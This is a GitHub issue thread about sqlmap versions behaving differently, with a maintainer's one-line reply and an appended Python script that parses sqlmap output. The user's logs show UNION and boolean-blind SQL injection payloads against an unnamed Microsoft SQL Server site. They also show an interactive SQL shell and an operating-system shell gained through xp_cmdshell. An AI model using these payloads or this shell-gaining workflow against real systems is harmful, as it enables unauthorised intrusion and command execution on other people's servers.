Closed emilyanncr closed 9 years ago
I believe that I've replied to this one (maybe I am wrong). Use --flush-session until sqlmap finds stacked SQLi. In your problematic run sqlmap was not able to detect it (there have been no changes here between those two versions).
Sooo sqlmap was recently updated and I've come across this situation. The two versions are allowing me to do different things using the same request. For example:
VIA OLD VERSION OF SQLMAP
C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:19:39
[20:19:39] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:20:06] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: UNION query <---- UNION
Title: Generic UNION query (NULL) - 84 columns
Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:20:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:20:08] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> <---------------------------------------------------------------------------------------- :)
[20:27:19] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:27:19
SQLMAP MOST RECENT RELEASE
C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell
(sqlmap ASCII banner) {1.0-dev-nongit-20140912} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:28:22
[20:28:22] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:28:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:28:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind <---- Boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:28:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:28:26] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> <------- ? hmmmm I thought stacked queries weren't identified? Wouldn't you need stacked to call even a sql-shell?
[20:50:40] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:50:40
VIA RECENTLY OUTDATED VERSION OF SQLMAP
C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --no-cast --text-only -v 1 -o --os-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:53:41
[20:53:41] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:53:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:53:42] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: UNION query
Title: Generic UNION query (NULL) - 84 columns
Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:53:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:53:44] [INFO] testing if current user is DBA
[20:53:44] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[20:54:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[20:54:15] [INFO] testing if xp_cmdshell extended procedure is usable
[20:54:18] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:54:19] [WARNING] the SQL query provided does not return any output
[20:54:19] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[20:54:23] [ERROR] unable to retrieve xp_cmdshell output
[20:54:23] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[20:54:23] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> <--------------------------------------- :)
VIA MOST RECENT UPDATE OF SQLMAP
C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --os-shell
(sqlmap ASCII banner) {1.0-dev-nongit-20140912} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:51:27
[20:51:27] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[20:51:29] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:51:29] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:51:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
[20:51:30] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported <---------------------------------- wahh
[*] shutting down at 20:51:30
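The behaviour in this thread comes down to sqlmap's session cache: every run above reports its injection points "with a total of 0 HTTP(s) requests", so the newer build is printing what the older build stored rather than re-testing, and a technique the old build never recorded (stacked queries, which the newer build's CRITICAL message says --os-shell needs) cannot appear until the session is flushed. The script below is an added example for reviewing captured sqlmap output; it is not part of sqlmap and not the poster's code. It parses a run transcript, reports whether the findings were replayed from the session file, and lists which techniques are present. The two sample transcripts are constructed to resemble the output in this issue; the regular expressions key only on sqlmap message strings that appear above.

```python
"""Triage helper for captured sqlmap run output (added example, not sqlmap's own code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Technique label exactly as sqlmap prints it after "Type:".
STACKED = "stacked queries"


@dataclass
class RunSummary:
    http_requests: Optional[int] = None   # from "... a total of N HTTP(s) requests"
    resumed_dbms: Optional[str] = None    # from "resuming back-end DBMS '...'"
    techniques: List[str] = field(default_factory=list)  # every "Type: ..." entry, in order
    shell_refused: bool = False           # the CRITICAL refusal seen in the newer build's run

    @property
    def resumed_from_session(self) -> bool:
        # Zero requests means nothing was sent: every finding came from the session file.
        return self.http_requests == 0

    @property
    def has_stacked(self) -> bool:
        return STACKED in self.techniques


_REQ = re.compile(r"a total of (\d+) HTTP\(s\) requests")
_RESUME = re.compile(r"resuming back-end DBMS '([^']+)'")
# Stop at an inline "<---" annotation, at a fused "Title:" field, or at end of line.
_TYPE = re.compile(r"Type:\s*(.+?)(?:\s*<-|\s+Title:|\s*$)")
_REFUSED = re.compile(r"\[CRITICAL\].*stacked queries SQL injection is not supported")


def parse_run(text: str) -> RunSummary:
    """Extract request count, resumed DBMS, technique list and the shell refusal from a transcript."""
    s = RunSummary()
    for line in text.splitlines():
        m = _REQ.search(line)
        if m:
            s.http_requests = int(m.group(1))
        m = _RESUME.search(line)
        if m:
            s.resumed_dbms = m.group(1)
        m = _TYPE.search(line)
        if m:
            s.techniques.append(m.group(1).strip())
        if _REFUSED.search(line):
            s.shell_refused = True
    return s


def triage(s: RunSummary) -> List[str]:
    """Return the review notes a transcript earns; an empty list means nothing to flag."""
    notes = []
    if s.resumed_from_session:
        notes.append("findings were replayed from the session file (0 requests sent); this build did not re-test them")
    if not s.has_stacked:
        notes.append("no 'stacked queries' technique listed; --os-shell hits the 'not supported' refusal until a --flush-session run records one")
    if s.shell_refused:
        notes.append("this run already ended in the CRITICAL 'stacked queries SQL injection is not supported' refusal")
    return notes


# Constructed sample transcripts (modelled on the output in this issue, not copied from a real target).
CACHED_RUN = """\
[20:28:24] [INFO] resuming back-end DBMS 'microsoft sql server'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: UNION query <---- UNION
Title: Generic UNION query (NULL) - 84 columns
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
[20:51:30] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported
"""

FRESH_RUN = """\
sqlmap identified the following injection points with a total of 312 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Type: stacked queries
Title: stacked queries (constructed sample line)
"""

if __name__ == "__main__":
    for name, text in (("cached run", CACHED_RUN), ("fresh run", FRESH_RUN)):
        summary = parse_run(text)
        print(f"{name}: techniques={summary.techniques}")
        for note in triage(summary) or ["nothing to flag"]:
            print("  -", note)
```

Running it on the two samples shows the pattern from the thread: the cached run lists UNION and boolean-based techniques but earns all three notes, while the fresh run (non-zero request count, stacked queries recorded) earns none.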